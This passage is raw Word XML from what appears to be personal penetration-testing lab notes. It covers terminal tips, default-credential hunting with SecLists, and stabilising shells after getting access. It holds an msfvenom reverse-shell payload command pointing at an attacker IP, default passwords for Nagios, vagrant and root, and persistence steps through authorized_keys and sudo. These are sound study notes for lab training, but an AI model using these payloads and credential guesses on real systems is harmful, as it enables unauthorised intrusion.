        </w:rPr>
        <w:t xml:space="preserve">Drag and drop into terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000234">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A string will appear in the terminal, which will be the path to where the drag and drop is located!</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -name ".git",*backup*,*.zip, 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / \( -iname ".git" -o -iname "*backup*" -o -iname "*.zip" \) 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE PENELOPE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When copy and pasting from a website to the command line, sometimes they use curly quotes instead of straight quotes.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The terminal only understands straight quotes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so manually change them to straight quotes. You know they are straight quotes when they turn orange</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An example of curly quotes is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/shell_reverse_tcp -b </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST=192.168.45.201 LPORT=443 -e x86/alpha_mixed -f c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Kevin</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240">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To turn off curly (smart) quotes in Google Doc, go to "Tools" and then "Preference" and then uncheck "Use Smart Quotes," and then go to CTRL + F and replace all the curly quotes with the straight quotes just by replacing itself with itself</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000241">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000242">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a password or a flag isn't working even though it should, that possibly means it's encoded or encrypted and needs to be decoded or decrypted. Like if it ends in "==", that means it's probably base64 encoded</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can save the IP of target machine as an environment variable to make it easier to run commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip="10.10.10.10"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap $ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000247">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just type $ip whenever you want to use the IP address</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIP: On the target machine, move to /tmp or any other non-important directory (like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) since sometimes if you are in another directory, you might not have valid permissions to upload to that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the reverse shell, if port 4444 doesn't work. It might be blocked. Try ports like 80 and 443 that likely not blocked. Since your Kali Machine doesn't use port 80 pr 443, it should work</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n0iyvt7nyda" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Credentials</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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Billyboss</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we learned a cool strategy to look for default credentials for a service. Let's say the service is called "Sonatype Nexus." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /usr/share/seclists/Passwords/Default-Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000253">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't have seclists, then download it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000254">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install seclists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000255">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -r "Sonatype Nexus"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will recursively search the entire directory for this string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="457200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="182" name="image189.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image189.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we see two sets of credentials. The latter of which was used to get into the website</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t xml:space="preserve">Vagrant:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a user vagrant, then try logging in with password "vagrant", as shown in Blogger PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in the password "vagrant"</w:t>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t xml:space="preserve">Nagios XI:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000260">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: nagiosadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: admin</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try logging in as root via "su root" and then try password "root"</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6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_plcyhht2z52v" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get a more stable connection after getting reverse shell</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obviously, try upgrading the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000269">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, then upload your private key to authorized_keys and then SSH into machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SSH public key injection attack via authorized_keys file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a sudo </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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3z9piaqe9pj3" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</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Whenever I try doing pip3 install, I get this error:</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5943600" cy="2006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="419" name="image425.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image425.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>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But, if you look at the bottom, it tells you that you can bypass it by using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--break-system-packages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, you can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip3 install &lt;package&gt; --break-system-packages</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_38ax56qcj64d" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
